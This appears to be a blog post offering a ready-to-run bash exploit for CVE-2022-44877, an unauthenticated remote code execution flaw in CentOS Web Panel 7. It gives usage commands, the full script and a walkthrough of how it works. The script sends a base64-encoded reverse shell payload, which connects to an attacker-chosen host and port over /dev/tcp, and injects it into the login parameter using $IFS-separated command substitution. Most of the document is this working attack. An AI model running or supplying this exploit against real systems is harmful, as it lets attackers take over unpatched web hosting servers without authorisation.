Here is the exploitation script of the Centos Web Panel 7 — CWP Unauthenticated RCE CVE-2022–44877
The script from here:
https://github.com/mhzcyber/CVE-Analysis/blob/main/CVE-2022%E2%80%9344877/CVE-2022-44877Exploit.sh
How to use the exploitation script:
Run listener:
Make the script executable:
chmod +x CVE-2022-44877Exploit.sh
Run the script:
./CVE-2022-44877Exploit.sh https://192.168.1.108:2031/ root 192.168.1.103 9001
Now we received a connection:
You can watch the exploitation script video here:
Code Explanation:
#!/bin/bashfunction help {
echo "[-] USAGE: $0 Target_URL Target_username LHOST LPORT"
echo "[-] Example: $0 https://192.168.1.108:2031/ root 192.168.1.100 9001"
exit 1
}function exploit {
target_url=$1
target_un=$2
lhost=$3
lport=$4payload="sh -i >& /dev/tcp/${lhost}/${lport} 0>&1"
payload_base64=$(echo -n ${payload} | base64)target_ip=$(egrep -o '([0-9]{1,3}[.]){3}[0-9]{1,3}' <<< ${target_url})echo $target_ipport=$(echo ${target_url} | grep -oP ':\K\d+')echo $portcurl -i -s -k -X $'POST' \
-H $'Host: '${target_ip}':'${port} \
-H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'username='${target_un}'&password=test&commit=Login' \
-g ${target_url}'login/index.php?login=$(echo${IFS}'${payload_base64}'${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)'}if [[ $# -eq 4 ]]; then
exploit "$1" "$2" "$3" "$4"
else
help
fi
This script has two main functions: help and exploit.
The help function will be called if the user does not provide the correct number of arguments when running the script.
It will display usage information and an example of how to run the script.
The exploit function takes four arguments: the target URL, the target username, the local host IP address, and the local port number.
First,
- the script defines the payload, which is a command that creates a reverse shell.
- The payload is then encoded in base64.
- It then extracts the target IP address from the URL and port number,
- and uses the
curlcommand to send a HTTP post request to the target with the payload in thelogin=parameter. - The payload is executed on the target server by base64 decoding the payload first and then running the command in bash.
#exploitation #tool #CVE-2022–44877
